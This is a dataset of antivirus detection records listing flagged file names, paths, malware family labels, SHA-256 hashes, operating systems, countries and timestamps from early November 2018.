  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T13:16:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='desinstalar.exe', filepath='G:\\PUBLICA\\Cida\\AIDF\\backup NF-e\\ARQUIVOS ANTIGOS\\Diversos\\Marcelo 23072009\\Andrea-Camila\\PASTA\\Declarações\\Dacon2006\\Desinstalar.exe', filesize=128000, name='TR/Crypt.XPACK.ilzsk.#M1.#R1'), hash='78d9a17c8ed438abba962d1bc61e851f232b0c4977775a583505710a73400c1d', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T23:03:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-144500-9694c22a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b808b86\\AVSCAN-20181101-143634-5BCAC3D6\\AVSCAN-20181101-144500-9694C22A', filesize=768000, name='TR/Drop.Agent.768000.#M1.#R1'), hash='41c1866fe221cb8e5e4ab7fe5c3ceb2441bb1f5148af6427e1d8b8f96b868102', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:45:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='4819e644019da2c8cccb3265b271e7de0e7cc63b2251c2914293877937870ab7', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-35\\4819E644019DA2C8CCCB3265B271E7DE0E7CC63B2251C2914293877937870AB7', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='4819e644019da2c8cccb3265b271e7de0e7cc63b2251c2914293877937870ab7', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:02:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msiexec64.exe', filepath='C:\\Users\\X\\AppData\\Local\\Wow64Cache\\MSieXec64.exe', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='BE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe', parentsize=6347056, timestamp='2018-11-01T08:19:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tsmuxer.exe', filepath='C:\\Program Files (x86)\\FormatFactory\\FFModules\\Encoder\\tsMuxer.exe', filesize=320000, name='W32/Ramnit.CD.#M1.#R1'), hash='7f5e89e3507bb8fd4eed0ecff40055fefcbe69f0f051ebf73e077fa26040131a', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:43:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='instmsiw.exe', filepath='D:\\Scan\\wulan1\\BACKUP\\BMD Street\\hysys 7.3\\aspenONEV7.3dvd1\\administration\\AUT Client\\instmsiw.exe', filesize=1856000, name='W32/Virut.Gen.#M1.#R1'), hash='58976432b3037c64669a08a76209791c56a1c7e76f5ea872de52c4d77314ff22', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe783_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe783 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T14:45:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T20:56:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T10:13:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T07:01:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='36a2f49af723e45496a055b7ad5de21d0af8f148a36432055274e0d64e1ca67b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\36A2F49AF723E45496A055B7AD5DE21D0AF8F148A36432055274E0D64E1CA67B', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='36a2f49af723e45496a055b7ad5de21d0af8f148a36432055274e0d64e1ca67b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:04:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='3ce845b71def4059502be3b85b3db4e1ec327bd04cffb0c62fe92ad57482fbca', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='SA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T08:59:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='luxury (1).exe', filepath='c:\\users\\X\\downloads\\luxury (1).exe', filesize=1024000, name='GAME/Casino.Gen.#M1.#R1'), hash='49f7979921ed9e8a90658b1fa0837e9f0befe740bc52b793062a83f390650809', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T19:32:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-002344-409b177a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-002012-29AB3F0F\\AVSCAN-20181102-002344-409B177A', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:23:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T00:01:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='win32driverhost.exe', filepath='C:\\Users\\X\\AppData\\Roaming\\win32driverhost.exe', filesize=1536000, name='TR/Crypt.TPM.Gen.#M300.#R2864'), hash='08af53c69828cc5c898e7047a1a410ce7f1b380464b7a82fcfa75e6925ba45a5', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-01T18:38:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-120501-de980609', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_46e468d5\\AVSCAN-20181101-120447-DC90FE22\\AVSCAN-20181101-120501-DE980609', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:05:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='3124d8c627d8f2b7124815abfde8c653e0f8659e2f7992c1808d9a59fa4d9d49', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-01T06:30:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='3ce845b71def4059502be3b85b3db4e1ec327bd04cffb0c62fe92ad57482fbca', metadata=Row(cmdline='\\\\\\/Embedding', country='SA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-01T12:34:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EX00.313\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='AU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EX00.313\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T22:11:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='test organizzazione.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\DOCENZE\\ENGIM\\test diritto\\test organizzazione.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:23:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\h1lr3rq0jq3\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:40:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='legge 626-94.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\DOCENZE\\SICUREZZA NEI LUOGHI DI LAVORO\\legge 626-94.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:26:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='privacy', filepath='/Users/dani/.Trash/Mac Auto Fixer.app/Contents/PlugIns/Privacy.plugin/Contents/MacOS/Privacy', filesize=748000, name='OSX/GT32SupportGeeks.guhch.#M0.#R0'), hash='e22ee5368f3d08e28aae4acd1dd0994f2ed34fdd0ab162ba8d6e175daf0d26b0', metadata=Row(cmdline=None, country='CZ', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T20:01:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='c544197bbc023222ce81f009c5b069e9da34c8d76bafbc41fd8e21b1477b11ef', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-32\\C544197BBC023222CE81F009C5B069E9DA34C8D76BAFBC41FD8E21B1477B11EF', filesize=448000, name='HEUR/AGEN.1014473.#M1.#R1'), hash='c544197bbc023222ce81f009c5b069e9da34c8d76bafbc41fd8e21b1477b11ef', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:52:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered facod', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered facod', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='dc26e9b5291e93bbb8f1e419cf449550fd705fd81d2a415254b31a9604c2a82e', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:16:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ccebfb768ec2eed177e9edee4a17094e96bc634e', filepath='C:\\Users\\X\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\ag41nkvc.default\\cache2\\entries\\CCEBFB768EC2EED177E9EDEE4A17094E96BC634E', filesize=8000, name='PUA/CryptoMiner.Gen.#M1.#R1'), hash='ebb357cc4d066bca88c3c2b696add4b0537025d1b5e5bb17374340a31390e69b', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Mozilla Firefox\\firefox.exe', parentsize=510928, timestamp='2018-11-01T23:39:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='synctask.exe', filepath='C:\\Users\\X\\AppData\\Local\\29d4af865fc1c2f21c02365364e4bd9d\\synctask.exe', filesize=1600000, name='HEUR/AGEN.1033829.#M1.#R1'), hash='e4b6c38e78ff4fc0d5fbe2998c3558522f1186a370f41cc0a1dd516bb4c88c0b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:56:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-151938-6e29c345', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-151938-6E29C345', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:19:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='instmsiw.exe', filepath='D:\\Scan\\wulan1\\BACKUP\\BMD Street\\hysys 7.3\\aspenONEV7.3dvd1\\administration\\AFW\\instmsiw.exe', filesize=1856000, name='W32/Virut.Gen.#M1.#R1'), hash='b0dc31bd73c67f690775047ff0ba3bba16a49474383cec166fa822e0049e63a0', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe779_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe779 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T11:45:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='sensory couple (2015) - complete.exe', filepath='F:\\\xa0\\Sensory Couple (2015) - Complete\\Sensory Couple (2015) - Complete.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='8f550c00679c6f6e4a3914e9ee9b031c968915e891283e79fe284934158d53aa', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T02:30:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='82085e7b68aca89cf19ff417e05680a940923771', filepath='C:\\Users\\X\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\31bq7vmx.default\\cache2\\entries\\82085E7B68ACA89CF19FF417E05680A940923771', filesize=40000, name='HTML/Infected.WebPage.Gen.#M1.#R1'), hash='941728eae9f2e067adc34f1fa8a4f497540d0fba9e95eb26b0593b3aa11d28fc', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe', parentsize=510928, timestamp='2018-11-01T12:17:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='kwk.exe', filepath='\\\\?\\G:\\Bibliothèques\\Visual Novel Japonais\\Kare wa Kanojo\\kwk.exe', filesize=128000, name='TR/Crypt.ZPACK.Gen.#M300.#R2504'), hash='bf4c810d47d7559e3b150649d8ab0672d9e8971c4f4d603c161efcd2692b4fb2', metadata=Row(cmdline=None, country='CA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:10:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='assistente infanzia.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\MODULI ENGIM\\CORSI FORMAZIONE ADULTI\\SOCIO SANITARI\\ASSISTENTE INFANZIA.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:13:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0a8ff1bb49fc13b45aaf1734cca406807f4c6b0cf7370750580a69c7ad2a7f5', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\A0A8FF1BB49FC13B45AAF1734CCA406807F4C6B0CF7370750580A69C7AD2A7F5', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='a0a8ff1bb49fc13b45aaf1734cca406807f4c6b0cf7370750580a69c7ad2a7f5', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:09:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-094922-b4bbdefa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-094836-AAD64268\\AVSCAN-20181101-094922-B4BBDEFA', filesize=2216000, name='PUA/Softcnapp.#M1.#R1'), hash='d459c3ef5011147cda165096d073d3ff14cb504ed1abc1f88638508c4705b41c', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:52:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='45b5cd46-e8fa-c91b-f015-ed71d99e6247.exe', filepath='H:\\{dc86b55d-9ce5-6da4-cd3b-f479b33f70f9}\\45b5cd46-e8fa-c91b-f015-ed71d99e6247.exe', filesize=256000, name='TR/Dropper.Gen.#M300.#R4148'), hash='864c5147eb1d46a675ca2064414e42ddd8bd55da363d9321ccf58480954c6bec', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-01T13:01:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a41f0021e269dc55a28db460807bc14334adb3ee00d942832c42b630ed4db51f', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-33\\A41F0021E269DC55A28DB460807BC14334ADB3EE00D942832C42B630ED4DB51F', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='a41f0021e269dc55a28db460807bc14334adb3ee00d942832c42b630ed4db51f', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T15:13:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Program Files\\InstallShield Installation Information\\{79D0F056-39DE-4FDD-83FD-1554CE2C6443}\\setup.exe', filesize=892000, name='W32/Sality.AW.#M1.#R1'), hash='9b83e17cb032b8ecc38e3a03738583b90281148c402d2a621b62fbc543bcafe6', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T14:51:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\1h0xprhnnfz\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T10:50:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0cba91030d6a094d7548e44972b4e4375857b07e9b744adf071b540b79e597b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-17\\A0CBA91030D6A094D7548E44972B4E4375857B07E9B744ADF071B540B79E597B', filesize=1600000, name='ADWARE/MultiPlug.Gen7.#M300.#R601903'), hash='a0cba91030d6a094d7548e44972b4e4375857b07e9b744adf071b540b79e597b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:13:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='audiodg.exe', filepath='\\\\?\\C:\\Windows\\system32\\AUDIODG.EXE', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='aa13c3c41c4a718e4b0c4da457094f6a51caf4689210aafa551e98bfe2f13b14', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:17:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181105-001516-7f6d888b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_56558570\\AVSCAN-20181105-000934-5B9BEDE8\\AVSCAN-20181105-001516-7F6D888B', filesize=256000, name='TR/Agent.9c4d03.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T20:45:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='z8j7cvbc5.exe', filepath='\\\\?\\C:\\Program Files\\Z8J7CVBC5R\\Z8J7CVBC5.exe', filesize=832000, name='TR/Dropper.Gen.#M300.#R4133'), hash='733e354c150b4149737ae67afd29dc8e971759219779881f1f0375c6118fb5b9', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:57:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='lostfile_exe_47439237.exe', filepath='\\\\?\\C:\\Users\\X\\Dropbox\\Formateo de PC\\Escuelas\\Escuela Nueva TP\\Imagen bak up\\E\\Lost Files\\LostFile_EXE_47439237.exe', filesize=64000, name='HEUR/APC.#M1.#R1'), hash='a607f8a9413c5962ae0ce18b580c9b2359c984f0b22aecfab53a327e3cfaf32b', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T23:57:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-130456-faaabef1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130336-F49E60EB\\AVSCAN-20181104-130456-FAAABEF1', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:04:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-165217-104e2955', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_add6866d\\AVSCAN-20181104-165200-060C621D\\AVSCAN-20181104-165217-104E2955', filesize=13184000, name='HEUR/APC.#M1.#R1'), hash='30c0783c80e8e28ed520667a8042d69a7e947005e81afee0d1919b37935d867e', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T08:52:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-173035-195a353d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e28951c1\\AVSCAN-20181104-170735-27CB4304\\AVSCAN-20181104-173035-195A353D', filesize=768000, name='WORM/Pimybot.JA.1.#M1.#R1'), hash='5cc1e61c072716b3441ffa86c7e63567559b222d6f7826a593b9793e5bd8d99c', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:30:35Z'), dt=datetime.date(2018, 11, 4)),
